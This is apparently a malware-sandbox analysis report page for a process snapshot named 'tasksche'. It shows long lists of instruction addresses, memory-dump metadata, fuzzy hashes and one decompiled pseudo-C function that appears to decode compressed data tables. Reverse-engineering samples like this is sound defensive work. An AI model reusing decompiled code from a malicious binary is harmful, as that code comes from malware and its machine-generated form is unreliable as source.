                                                                                              0x0041498c
                                                                                              0x0041499d
                                                                                              0x004149a4
                                                                                              0x004149a4
                                                                                              0x004149ae
                                                                                              0x004149b1
                                                                                              0x004149b3
                                                                                              0x004149b6
                                                                                              0x004149b9
                                                                                              0x004149bc
                                                                                              0x004149be
                                                                                              0x004149be
                                                                                              0x004149c1
                                                                                              0x004149c2
                                                                                              0x004149c2
                                                                                              0x004149c4
                                                                                              0x004149c7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004149c9
                                                                                              0x004149c9
                                                                                              0x004149cc
                                                                                              0x00414f03
                                                                                              0x00000000
                                                                                              0x00414f03
                                                                                              0x004149d2
                                                                                              0x004149e0
                                                                                              0x004149e0
                                                                                              0x004149e3
                                                                                              0x004149f2
                                                                                              0x004149f2
                                                                                              0x004149f8
                                                                                              0x00414efc
                                                                                              0x00414efc
                                                                                              0x00000000
                                                                                              0x00414efc
                                                                                              0x00000000
                                                                                              0x004149f8
                                                                                              0x004149e5
                                                                                              0x004149ec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004149ec
                                                                                              0x004149d7
                                                                                              0x004149da
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004149fe
                                                                                              0x004149fe
                                                                                              0x00414a04
                                                                                              0x00414a09
                                                                                              0x00414a0f
                                                                                              0x00414a11
                                                                                              0x00414a13
                                                                                              0x00414a18
                                                                                              0x00414a19
                                                                                              0x00414a1f
                                                                                              0x00414a21
                                                                                              0x00414a28
                                                                                              0x00414a2a
                                                                                              0x00414a2c
                                                                                              0x00414a33
                                                                                              0x00414a33
                                                                                              0x00414a2c
                                                                                              0x00414a38
                                                                                              0x00414a43
                                                                                              0x00414a4c
                                                                                              0x00414a4f
                                                                                              0x00414a55
                                                                                              0x00414a5a
                                                                                              0x00414a60
                                                                                              0x00414a65
                                                                                              0x00414a69
                                                                                              0x00414a94
                                                                                              0x00414a95
                                                                                              0x00414a9c
                                                                                              0x00414a9f
                                                                                              0x00414ab7
                                                                                              0x00414aba
                                                                                              0x00414ac4
                                                                                              0x00414ac6
                                                                                              0x00414acc
                                                                                              0x00414ad3
                                                                                              0x00414ad8
                                                                                              0x00414adc
                                                                                              0x00414adf
                                                                                              0x00414ae1
                                                                                              0x00414ae1
                                                                                              0x00414ae1
                                                                                              0x00414ae3
                                                                                              0x00000000
                                                                                              0x00414ae3
                                                                                              0x00414aa1
                                                                                              0x00414aa5
                                                                                              0x00414aa5
                                                                                              0x00414aa7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414aa9
                                                                                              0x00414aaa
                                                                                              0x00414aad
                                                                                              0x00414ab0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414ab2
                                                                                              0x00414ab4
                                                                                              0x00000000
                                                                                              0x00414a6b
                                                                                              0x00414a6d
                                                                                              0x00414a70
                                                                                              0x00414a7a
                                                                                              0x00414a82
                                                                                              0x00414a87
                                                                                              0x00414a8a
                                                                                              0x00414aeb
                                                                                              0x00414af0
                                                                                              0x00414af2
                                                                                              0x00414b31
                                                                                              0x00414b36
                                                                                              0x00414d8d
                                                                                              0x00414d8f
                                                                                              0x00414de0
                                                                                              0x00414de5
                                                                                              0x00414df9
                                                                                              0x00414dff
                                                                                              0x00414e02
                                                                                              0x00414e07
                                                                                              0x00414e0d
                                                                                              0x00414e12
                                                                                              0x00414e19
                                                                                              0x00414e44
                                                                                              0x00414e45
                                                                                              0x00414e4c
                                                                                              0x00414e4f
                                                                                              0x00414e6a
                                                                                              0x00414e6d
                                                                                              0x00414e77
                                                                                              0x00414e79
                                                                                              0x00414e7f
                                                                                              0x00414e89
                                                                                              0x00414e8e
                                                                                              0x00414e95
                                                                                              0x00414e9b
                                                                                              0x00414e9d
                                                                                              0x00414e9d
                                                                                              0x00414e9d
                                                                                              0x00414e9f
                                                                                              0x00414ea7
                                                                                              0x00414ea7
                                                                                              0x00414eaa
                                                                                              0x00414eb9
                                                                                              0x00414ebf
                                                                                              0x00414ec3
                                                                                              0x00414ec4
                                                                                              0x00414ec7
                                                                                              0x00414ec9
                                                                                              0x00414ecd
                                                                                              0x00414ed4
                                                                                              0x00414eda
                                                                                              0x00414ee0
                                                                                              0x00414ee8
                                                                                              0x00414eea
                                                                                              0x00414eea
                                                                                              0x00414eed
                                                                                              0x00414ef0
                                                                                              0x00414ef0
                                                                                              0x00414eac
                                                                                              0x00414eac
                                                                                              0x00414eac
                                                                                              0x00414ef3
                                                                                              0x00414ef3
                                                                                              0x004149c2
                                                                                              0x004149c2
                                                                                              0x004149c4
                                                                                              0x004149c7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004149c7
                                                                                              0x004149c2
                                                                                              0x00414e51
                                                                                              0x00414e58
                                                                                              0x00414e58
                                                                                              0x00414e5a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414e5c
                                                                                              0x00414e5d
                                                                                              0x00414e60
                                                                                              0x00414e63
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414e65
                                                                                              0x00414e67
                                                                                              0x00000000
                                                                                              0x00414e67
                                                                                              0x00414e1d
                                                                                              0x00414e20
                                                                                              0x00414e2a
                                                                                              0x00414e32
                                                                                              0x00414e37
                                                                                              0x00414e3a
                                                                                              0x00000000
                                                                                              0x00414e3a
                                                                                              0x00414de7
                                                                                              0x004149c2
                                                                                              0x004149c2
                                                                                              0x004149c4
                                                                                              0x004149c7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004149c7
                                                                                              0x004149c2
                                                                                              0x00414d97
                                                                                              0x00414d99
                                                                                              0x00414da3
                                                                                              0x00414daa
                                                                                              0x00414daf
                                                                                              0x00414db0
                                                                                              0x00414db2
                                                                                              0x00414dbd
                                                                                              0x00414dc4
                                                                                              0x00414dca
                                                                                              0x00414dd1
                                                                                              0x00414dd8
                                                                                              0x004149c2
                                                                                              0x004149c2
                                                                                              0x004149c4
                                                                                              0x004149c7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004149c7
                                                                                              0x004149c2
                                                                                              0x00414b3c
                                                                                              0x00414b41
                                                                                              0x00414b44
                                                                                              0x00414b56
                                                                                              0x00414b60
                                                                                              0x00414b63
                                                                                              0x00414b65
                                                                                              0x00414b69
                                                                                              0x00414b70
                                                                                              0x00414b75
                                                                                              0x00414b7b
                                                                                              0x00414b82
                                                                                              0x00414b84
                                                                                              0x00414b84
                                                                                              0x00414b87
                                                                                              0x00414b87
                                                                                              0x00414b46
                                                                                              0x00414b49
                                                                                              0x00414b49
                                                                                              0x00414b8f
                                                                                              0x00414b92
                                                                                              0x00414b97
                                                                                              0x00414b9d
                                                                                              0x00414ba2
                                                                                              0x00414ba9
                                                                                              0x00414bd6
                                                                                              0x00414bd7
                                                                                              0x00414bda
                                                                                              0x00414bdc
                                                                                              0x00414bf6
                                                                                              0x00414bf9
                                                                                              0x00414c00
                                                                                              0x00414c06
                                                                                              0x00414c11
                                                                                              0x00414c16
                                                                                              0x00414c1d
                                                                                              0x00414c23
                                                                                              0x00414c25
                                                                                              0x00414c25
                                                                                              0x00414c25
                                                                                              0x00414c27
                                                                                              0x00000000
                                                                                              0x00414c27
                                                                                              0x00414bde
                                                                                              0x00414be5
                                                                                              0x00414be5
                                                                                              0x00414be7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414be9
                                                                                              0x00414bea
                                                                                              0x00414bed
                                                                                              0x00414bf0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414bf2
                                                                                              0x00414bf4
                                                                                              0x00000000
                                                                                              0x00414bab
                                                                                              0x00414bad
                                                                                              0x00414bb0
                                                                                              0x00414bba
                                                                                              0x00414bc2
                                                                                              0x00414bc7
                                                                                              0x00414bca
                                                                                              0x00414c2f
                                                                                              0x00414c2f
                                                                                              0x00414c32
                                                                                              0x00414c44
                                                                                              0x00414c4d
                                                                                              0x00414c50
                                                                                              0x00414c52
                                                                                              0x00414d52
                                                                                              0x00414d52
                                                                                              0x00414d55
                                                                                              0x00414d5b
                                                                                              0x00414d75
                                                                                              0x00414d5d
                                                                                              0x00414d60
                                                                                              0x00414d61
                                                                                              0x00414d67
                                                                                              0x00414d69
                                                                                              0x00414d6a
                                                                                              0x00414d70
                                                                                              0x00414d72
                                                                                              0x00414d72
                                                                                              0x00414d70
                                                                                              0x00414d67
                                                                                              0x00414d78
                                                                                              0x00414d7b
                                                                                              0x00414d81
                                                                                              0x00414d85
                                                                                              0x004149c2
                                                                                              0x004149c2
                                                                                              0x004149c4
                                                                                              0x004149c7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004149c7
                                                                                              0x004149c2
                                                                                              0x00414c58
                                                                                              0x00414c5b
                                                                                              0x00414d31
                                                                                              0x00414d38
                                                                                              0x00414d3d
                                                                                              0x00414d43
                                                                                              0x00414d4a
                                                                                              0x00414d4c
                                                                                              0x00414d4c
                                                                                              0x00414d4f
                                                                                              0x00000000
                                                                                              0x00414d4f
                                                                                              0x00414c61
                                                                                              0x00414c65
                                                                                              0x00414c6c
                                                                                              0x00414c74
                                                                                              0x00414c7a
                                                                                              0x00414c83
                                                                                              0x00414c85
                                                                                              0x00414c85
                                                                                              0x00414c88
                                                                                              0x00414c88
                                                                                              0x00414c8d
                                                                                              0x00414c92
                                                                                              0x00414c98
                                                                                              0x00414c9d
                                                                                              0x00414ca4
                                                                                              0x00414cd1
                                                                                              0x00414cd2
                                                                                              0x00414cd5
                                                                                              0x00414cd7
                                                                                              0x00414cf1
                                                                                              0x00414cf4
                                                                                              0x00414cfb
                                                                                              0x00414d01
                                                                                              0x00414d0c
                                                                                              0x00414d11
                                                                                              0x00414d18
                                                                                              0x00414d1e
                                                                                              0x00414d20
                                                                                              0x00414d20
                                                                                              0x00414d20
                                                                                              0x00414d22
                                                                                              0x00000000
                                                                                              0x00414d22
                                                                                              0x00414cd9
                                                                                              0x00414ce0
                                                                                              0x00414ce0
                                                                                              0x00414ce2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414ce4
                                                                                              0x00414ce5
                                                                                              0x00414ce8
                                                                                              0x00414ceb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414ced
                                                                                              0x00414cef
                                                                                              0x00000000
                                                                                              0x00414ca6
                                                                                              0x00414ca8
                                                                                              0x00414cab
                                                                                              0x00414cb5
                                                                                              0x00414cbd
                                                                                              0x00414cc2
                                                                                              0x00414cc5
                                                                                              0x00414d2a
                                                                                              0x00414d2a
                                                                                              0x00000000
                                                                                              0x00414d2a
                                                                                              0x00414ca4
                                                                                              0x00414c35
                                                                                              0x00000000
                                                                                              0x00414c35
                                                                                              0x00414ba9
                                                                                              0x00414af4
                                                                                              0x00414afb
                                                                                              0x00414b24
                                                                                              0x00414b24
                                                                                              0x00414b27
                                                                                              0x00414b2a
                                                                                              0x00000000
                                                                                              0x00414b2a
                                                                                              0x00414afd
                                                                                              0x00414b01
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414b03
                                                                                              0x00414b07
                                                                                              0x00414b0b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414b0d
                                                                                              0x00414b0e
                                                                                              0x00414b15
                                                                                              0x00414b19
                                                                                              0x00000000
                                                                                              0x00414b19
                                                                                              0x00414a69
                                                                                              0x0041498e
                                                                                              0x0041498e
                                                                                              0x00414f04
                                                                                              0x00000000
                                                                                              0x00414f04
                                                                                              0x00414959
                                                                                              0x00414965
                                                                                              0x00414969
                                                                                              0x00414970
                                                                                              0x00000000
                                                                                              0x00414972
                                                                                              0x00414972
                                                                                              0x00000000
                                                                                              0x00414972
                                                                                              0x00414970

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _realloc
                                                                                              • String ID:
                                                                                              • API String ID: 1750794848-0
                                                                                              • Opcode ID: 19fe713726019c3973d82b14b26a9fc68d02c60563561d4d82d0835d1efeca77
                                                                                              • Instruction ID: 2a1397d1efbb1e156a4ddc1088eaf27e515a490876f5f290c2ff2c2445328417
                                                                                              • Opcode Fuzzy Hash: 19fe713726019c3973d82b14b26a9fc68d02c60563561d4d82d0835d1efeca77
                                                                                              • Instruction Fuzzy Hash: 0B02E5B1A106069BCB1DCF28C5916E9B7E1FF85304F24852ED556CBA85D338F9E1CB88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E00413EE3(void* __ecx, unsigned int __edx) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				char _v32;
                                                                                              				char _v60;
                                                                                              				char _v77;
                                                                                              				char _v137;
                                                                                              				char _v436;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t113;
                                                                                              				char _t119;
                                                                                              				signed int _t124;
                                                                                              				unsigned int _t125;
                                                                                              				signed int _t128;
                                                                                              				signed int _t129;
                                                                                              				signed int _t132;
                                                                                              				intOrPtr _t149;
                                                                                              				signed int _t155;
                                                                                              				signed int _t157;
                                                                                              				signed int _t158;
                                                                                              				signed int _t161;
                                                                                              				signed int _t162;
                                                                                              				void* _t172;
                                                                                              				void* _t173;
                                                                                              				signed int _t185;
                                                                                              				void* _t187;
                                                                                              				intOrPtr* _t189;
                                                                                              				signed int _t198;
                                                                                              				intOrPtr* _t200;
                                                                                              				void* _t201;
                                                                                              				signed int _t204;
                                                                                              				signed int _t210;
                                                                                              				signed int _t211;
                                                                                              				signed int _t219;
                                                                                              				signed int _t221;
                                                                                              				intOrPtr* _t222;
                                                                                              				intOrPtr* _t224;
                                                                                              				void* _t225;
                                                                                              				void* _t226;
                                                                                              
                                                                                              				_t209 = __edx;
                                                                                              				_t173 = __ecx;
                                                                                              				_t224 = __ecx + 4;
                                                                                              				if( *_t224 <=  *((intOrPtr*)(__ecx + 0x78)) - 0x19) {
                                                                                              					L2:
                                                                                              					E004097BA(_t224,  ~( *(_t173 + 8)) & 0x00000007);
                                                                                              					_t113 = E004097D1(_t224);
                                                                                              					_t230 = _t113 & 0x00008000;
                                                                                              					if((_t113 & 0x00008000) == 0) {
                                                                                              						 *((intOrPtr*)(_t173 + 0xe654)) = 0;
                                                                                              						 *((intOrPtr*)(_t173 + 0x98c8)) = 0;
                                                                                              						 *((intOrPtr*)(_t173 + 0x98cc)) = 0;
                                                                                              						__eflags = _t113 & 0x00004000;
                                                                                              						if((_t113 & 0x00004000) == 0) {
                                                                                              							E0041A820(0, _t173 + 0xe4c0, 0, 0x194);
                                                                                              							_t226 = _t226 + 0xc;
                                                                                              						}
                                                                                              						E004097BA(_t224, 2);
                                                                                              						_v8 = 0;
                                                                                              						do {
                                                                                              							_v12 = E004097D1(_t224) >> 0x0000000c & 0x000000ff;
                                                                                              							E004097BA(_t224, 4);
                                                                                              							_t119 = _v12;
                                                                                              							__eflags = _t119 - 0xf;
                                                                                              							if(_t119 != 0xf) {
                                                                                              								 *((char*)(_t225 + _v8 - 0x1c)) = _t119;
                                                                                              								goto L16;
                                                                                              							}
                                                                                              							_t219 = E004097D1(_t224) >> 0x0000000c & 0x000000ff;
                                                                                              							E004097BA(_t224, 4);
                                                                                              							__eflags = _t219;
                                                                                              							if(_t219 != 0) {
                                                                                              								_t221 = _t219 + 2;
                                                                                              								while(1) {
                                                                                              									__eflags = _t221;
                                                                                              									if(_t221 <= 0) {
                                                                                              										break;
                                                                                              									}
                                                                                              									_t221 = _t221 - 1;
                                                                                              									__eflags = _v8 - 0x14;
                                                                                              									if(_v8 >= 0x14) {
                                                                                              										break;
                                                                                              									}
                                                                                              									_t23 =  &_v8;
                                                                                              									 *_t23 = _v8 + 1;
                                                                                              									__eflags =  *_t23;
                                                                                              									 *((char*)(_t225 + _v8 - 0x1c)) = 0;
                                                                                              								}
                                                                                              								_v8 = _v8 - 1;
                                                                                              								goto L16;
                                                                                              							}
                                                                                              							 *((char*)(_t225 + _v8 - 0x1c)) = 0xf;
                                                                                              							L16:
                                                                                              							_v8 = _v8 + 1;
                                                                                              							__eflags = _v8 - 0x14;
                                                                                              						} while (__eflags < 0);
                                                                                              						_t222 = _t173 + 0x3c44;
                                                                                              						E0041284B(__eflags,  &_v32, _t222, 0x14);
                                                                                              						_t37 =  &_v8;
                                                                                              						 *_t37 = _v8 & 0x00000000;
                                                                                              						__eflags =  *_t37;
                                                                                              						do {
                                                                                              							__eflags =  *_t224 -  *((intOrPtr*)(_t173 + 0x78)) - 5;
                                                                                              							if( *_t224 <=  *((intOrPtr*)(_t173 + 0x78)) - 5) {
                                                                                              								L20:
                                                                                              								_t124 = E0040978C(_t224);
                                                                                              								_t210 =  *(_t222 + 0x84);
                                                                                              								_t125 = _t124 & 0x0000fffe;
                                                                                              								__eflags = _t125 -  *((intOrPtr*)(_t222 + 4 + _t210 * 4));
                                                                                              								if(_t125 >=  *((intOrPtr*)(_t222 + 4 + _t210 * 4))) {
                                                                                              									_t211 = _t210 + 1;
                                                                                              									_v12 = 0xf;
                                                                                              									__eflags = _t211 - 0xf;
                                                                                              									if(_t211 >= 0xf) {
                                                                                              										L28:
                                                                                              										_t185 =  *(_t224 + 4) + _v12;
                                                                                              										 *_t224 =  *_t224 + (_t185 >> 3);
                                                                                              										_t209 = _v12;
                                                                                              										 *(_t224 + 4) = _t185 & 0x00000007;
                                                                                              										_t187 = 0x10;
                                                                                              										_t128 = (_t125 -  *((intOrPtr*)(_t222 + _v12 * 4)) >> _t187 - _v12) +  *((intOrPtr*)(_t222 + 0x44 + _t209 * 4));
                                                                                              										__eflags = _t128 -  *_t222;
                                                                                              										if(_t128 >=  *_t222) {
                                                                                              											_t128 = 0;
                                                                                              											__eflags = 0;
                                                                                              										}
                                                                                              										_t129 =  *(_t222 + 0xc88 + _t128 * 2) & 0x0000ffff;
                                                                                              										L31:
                                                                                              										__eflags = _t129 - 0x10;
                                                                                              										if(_t129 >= 0x10) {
                                                                                              											__eflags = _t129 - 0x12;
                                                                                              											_t189 = _t224;
                                                                                              											if(__eflags >= 0) {
                                                                                              												if(__eflags != 0) {
                                                                                              													_t132 = (E004097D1(_t189) >> 9) + 0xb;
                                                                                              													__eflags = _t132;
                                                                                              													_push(7);
                                                                                              												} else {
                                                                                              													_t132 = (E004097D1(_t189) >> 0xd) + 3;
                                                                                              													_push(3);
                                                                                              												}
                                                                                              												_v12 = _t132;
                                                                                              												E004097BA(_t224);
                                                                                              												while(1) {
                                                                                              													__eflags = _v12;
                                                                                              													if(_v12 <= 0) {
                                                                                              														goto L50;
                                                                                              													}
                                                                                              													_v12 = _v12 - 1;
                                                                                              													__eflags = _v8 - 0x194;
                                                                                              													if(_v8 >= 0x194) {
                                                                                              														goto L51;
                                                                                              													}
                                                                                              													_t90 =  &_v8;
                                                                                              													 *_t90 = _v8 + 1;
                                                                                              													__eflags =  *_t90;
                                                                                              													 *((char*)(_t225 + _v8 - 0x1b0)) = 0;
                                                                                              												}
                                                                                              												goto L50;
                                                                                              											}
                                                                                              											__eflags = _t129 - 0x10;
                                                                                              											if(_t129 != 0x10) {
                                                                                              												_t155 = (E004097D1(_t189) >> 9) + 0xb;
                                                                                              												__eflags = _t155;
                                                                                              												_push(7);
                                                                                              											} else {
                                                                                              												_t155 = (E004097D1(_t189) >> 0xd) + 3;
                                                                                              												_push(3);
                                                                                              											}
                                                                                              											_v12 = _t155;
                                                                                              											E004097BA(_t224);
                                                                                              											__eflags = _v8;
                                                                                              											if(_v8 > 0) {
                                                                                              												while(1) {
                                                                                              													__eflags = _v12;
                                                                                              													if(_v12 <= 0) {
                                                                                              														break;
                                                                                              													}
                                                                                              													_t157 = _v8;
                                                                                              													_v12 = _v12 - 1;
                                                                                              													__eflags = _t157 - 0x194;
                                                                                              													if(_t157 >= 0x194) {
                                                                                              														goto L51;
                                                                                              													}
                                                                                              													 *((char*)(_t225 + _t157 - 0x1b0)) =  *((intOrPtr*)(_t225 + _t157 - 0x1b1));
                                                                                              													_t158 = _t157 + 1;
                                                                                              													__eflags = _t158;
                                                                                              													_v8 = _t158;
                                                                                              												}
                                                                                              											}
                                                                                              											goto L50;
                                                                                              										}
                                                                                              										_t198 = _v8;
                                                                                              										_t209 =  *((intOrPtr*)(_t198 + _t173 + 0xe4c0)) + _t129 & 0x0000000f;
                                                                                              										 *(_t225 + _t198 - 0x1b0) =  *((intOrPtr*)(_t198 + _t173 + 0xe4c0)) + _t129 & 0x0000000f;
                                                                                              										_v8 = _t198 + 1;
                                                                                              										goto L50;
                                                                                              									}
                                                                                              									_t200 = _t222 + 4 + _t211 * 4;
                                                                                              									while(1) {
                                                                                              										__eflags = _t125 -  *_t200;
                                                                                              										if(_t125 <  *_t200) {
                                                                                              											break;
                                                                                              										}
                                                                                              										_t211 = _t211 + 1;
                                                                                              										_t200 = _t200 + 4;
                                                                                              										__eflags = _t211 - 0xf;
                                                                                              										if(_t211 < 0xf) {
                                                                                              											continue;
                                                                                              										}
                                                                                              										goto L28;
                                                                                              									}
                                                                                              									_v12 = _t211;
                                                                                              									goto L28;
                                                                                              								}
                                                                                              								_t201 = 0x10;
                                                                                              								_t161 = _t125 >> _t201 - _t210;
                                                                                              								_t204 = ( *(_t161 + _t222 + 0x88) & 0x000000ff) +  *(_t224 + 4);
                                                                                              								_t209 = _t204 >> 3;
                                                                                              								 *_t224 =  *_t224 + (_t204 >> 3);
                                                                                              								 *(_t224 + 4) = _t204 & 0x00000007;
                                                                                              								_t129 =  *(_t222 + 0x488 + _t161 * 2) & 0x0000ffff;
                                                                                              								goto L31;
                                                                                              							}
                                                                                              							_t162 = E0041236D(_t173, _t173, _t209);
                                                                                              							__eflags = _t162;
                                                                                              							if(_t162 == 0) {
                                                                                              								L52:
                                                                                              								_t149 = 0;
                                                                                              								L54:
                                                                                              								return _t149;
                                                                                              							}
                                                                                              							goto L20;
                                                                                              							L50:
                                                                                              							__eflags = _v8 - 0x194;
                                                                                              						} while (_v8 < 0x194);
                                                                                              						L51:
                                                                                              						__eflags =  *_t224 -  *((intOrPtr*)(_t173 + 0x78));
                                                                                              						 *((char*)(_t173 + 0xe658)) = 1;
                                                                                              						if(__eflags <= 0) {
                                                                                              							E0041284B(__eflags,  &_v436, _t173 + 0x94, 0x12b);
                                                                                              							E0041284B(__eflags,  &_v137, _t173 + 0xf80, 0x3c);
                                                                                              							E0041284B(__eflags,  &_v77, _t173 + 0x1e6c, 0x11);
                                                                                              							E0041284B(__eflags,  &_v60, _t173 + 0x2d58, 0x1c);
                                                                                              							_t174 = _t173 + 0xe4c0;
                                                                                              							__eflags = _t173 + 0xe4c0;
                                                                                              							E0041C290(_t173 + 0xe4c0, _t222, _t224, _t174,  &_v436, 0x194);
                                                                                              							_t149 = 1;
                                                                                              							goto L54;
                                                                                              						}
                                                                                              						goto L52;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_t173 + 0xe654)) = 1;
                                                                                              					return E00413A86(_t173 + 0x98d0, _t209, _t230, _t173, _t173 + 0xe4bc);
                                                                                              				}
                                                                                              				_t172 = E0041236D(__ecx, __ecx, __edx);
                                                                                              				if(_t172 != 0) {
                                                                                              					goto L2;
                                                                                              				}
                                                                                              				return _t172;
                                                                                              			}











































                                                                                              0x00413ee3
                                                                                              0x00413eed
                                                                                              0x00413ef3
                                                                                              0x00413efb
                                                                                              0x00413f0a
                                                                                              0x00413f15
                                                                                              0x00413f1c
                                                                                              0x00413f21
                                                                                              0x00413f26
                                                                                              0x00413f4d
                                                                                              0x00413f53
                                                                                              0x00413f59
                                                                                              0x00413f5f
                                                                                              0x00413f64
                                                                                              0x00413f73
                                                                                              0x00413f78
                                                                                              0x00413f78
                                                                                              0x00413f7f
                                                                                              0x00413f84
                                                                                              0x00413f87
                                                                                              0x00413f98
                                                                                              0x00413f9b
                                                                                              0x00413fa0
                                                                                              0x00413fa3
                                                                                              0x00413fa6
                                                                                              0x00413fee
                                                                                              0x00000000
                                                                                              0x00413fee
                                                                                              0x00413fb6
                                                                                              0x00413fb9
                                                                                              0x00413fbe
                                                                                              0x00413fc0
                                                                                              0x00413fcd
                                                                                              0x00413fe2
                                                                                              0x00413fe2
                                                                                              0x00413fe4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00413fd0
                                                                                              0x00413fd1
                                                                                              0x00413fd5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00413fda
                                                                                              0x00413fda
                                                                                              0x00413fda
                                                                                              0x00413fdd
                                                                                              0x00413fdd
                                                                                              0x00413fe6
                                                                                              0x00000000
                                                                                              0x00413fe6
                                                                                              0x00413fc5
                                                                                              0x00413ff2
                                                                                              0x00413ff2
                                                                                              0x00413ff5
                                                                                              0x00413ff5
                                                                                              0x00413ffd
                                                                                              0x0041400a
                                                                                              0x0041400f
                                                                                              0x0041400f
                                                                                              0x0041400f
                                                                                              0x00414013
                                                                                              0x00414019
                                                                                              0x0041401b
                                                                                              0x0041402c
                                                                                              0x0041402e
                                                                                              0x00414033
                                                                                              0x00414039
                                                                                              0x0041403e
                                                                                              0x00414042
                                                                                              0x0041406d
                                                                                              0x0041406e
                                                                                              0x00414075
                                                                                              0x00414078
                                                                                              0x00414090
                                                                                              0x00414093
                                                                                              0x0041409d
                                                                                              0x0041409f
                                                                                              0x004140a5
                                                                                              0x004140ab
                                                                                              0x004140b0
                                                                                              0x004140b4
                                                                                              0x004140b6
                                                                                              0x004140b8
                                                                                              0x004140b8
                                                                                              0x004140b8
                                                                                              0x004140ba
                                                                                              0x004140c2
                                                                                              0x004140c2
                                                                                              0x004140c5
                                                                                              0x004140e6
                                                                                              0x004140e9
                                                                                              0x004140eb
                                                                                              0x00414147
                                                                                              0x00414160
                                                                                              0x00414160
                                                                                              0x00414163
                                                                                              0x00414149
                                                                                              0x00414151
                                                                                              0x00414154
                                                                                              0x00414154
                                                                                              0x00414167
                                                                                              0x0041416a
                                                                                              0x0041418b
                                                                                              0x0041418b
                                                                                              0x0041418f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414171
                                                                                              0x00414174
                                                                                              0x0041417b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414180
                                                                                              0x00414180
                                                                                              0x00414180
                                                                                              0x00414183
                                                                                              0x00414183
                                                                                              0x00000000
                                                                                              0x0041418b
                                                                                              0x004140ed
                                                                                              0x004140f0
                                                                                              0x00414109
                                                                                              0x00414109
                                                                                              0x0041410c
                                                                                              0x004140f2
                                                                                              0x004140fa
                                                                                              0x004140fd
                                                                                              0x004140fd
                                                                                              0x00414110
                                                                                              0x00414113
                                                                                              0x00414118
                                                                                              0x0041411c
                                                                                              0x0041413f
                                                                                              0x0041413f
                                                                                              0x00414143
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414120
                                                                                              0x00414123
                                                                                              0x00414126
                                                                                              0x0041412b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414134
                                                                                              0x0041413b
                                                                                              0x0041413b
                                                                                              0x0041413c
                                                                                              0x0041413c
                                                                                              0x00414145
                                                                                              0x00000000
                                                                                              0x0041411c
                                                                                              0x004140c7
                                                                                              0x004140d3
                                                                                              0x004140d6
                                                                                              0x004140de
                                                                                              0x00000000
                                                                                              0x004140de
                                                                                              0x0041407a
                                                                                              0x0041407e
                                                                                              0x0041407e
                                                                                              0x00414080
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414082
                                                                                              0x00414083
                                                                                              0x00414086
                                                                                              0x00414089
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041408b
                                                                                              0x0041408d
                                                                                              0x00000000
                                                                                              0x0041408d
                                                                                              0x00414046
                                                                                              0x00414049
                                                                                              0x00414053
                                                                                              0x00414058
                                                                                              0x0041405b
                                                                                              0x00414060
                                                                                              0x00414063
                                                                                              0x00000000
                                                                                              0x00414063
                                                                                              0x0041401f
                                                                                              0x00414024
                                                                                              0x00414026
                                                                                              0x004141ac
                                                                                              0x004141ac
                                                                                              0x00414226
                                                                                              0x00000000
                                                                                              0x00414226
                                                                                              0x00000000
                                                                                              0x00414191
                                                                                              0x00414191
                                                                                              0x00414191
                                                                                              0x0041419e
                                                                                              0x004141a0
                                                                                              0x004141a3
                                                                                              0x004141aa
                                                                                              0x004141c5
                                                                                              0x004141dc
                                                                                              0x004141f0
                                                                                              0x00414204
                                                                                              0x00414215
                                                                                              0x00414215
                                                                                              0x0041421c
                                                                                              0x00414224
                                                                                              0x00000000
                                                                                              0x00414224
                                                                                              0x00000000
                                                                                              0x004141aa
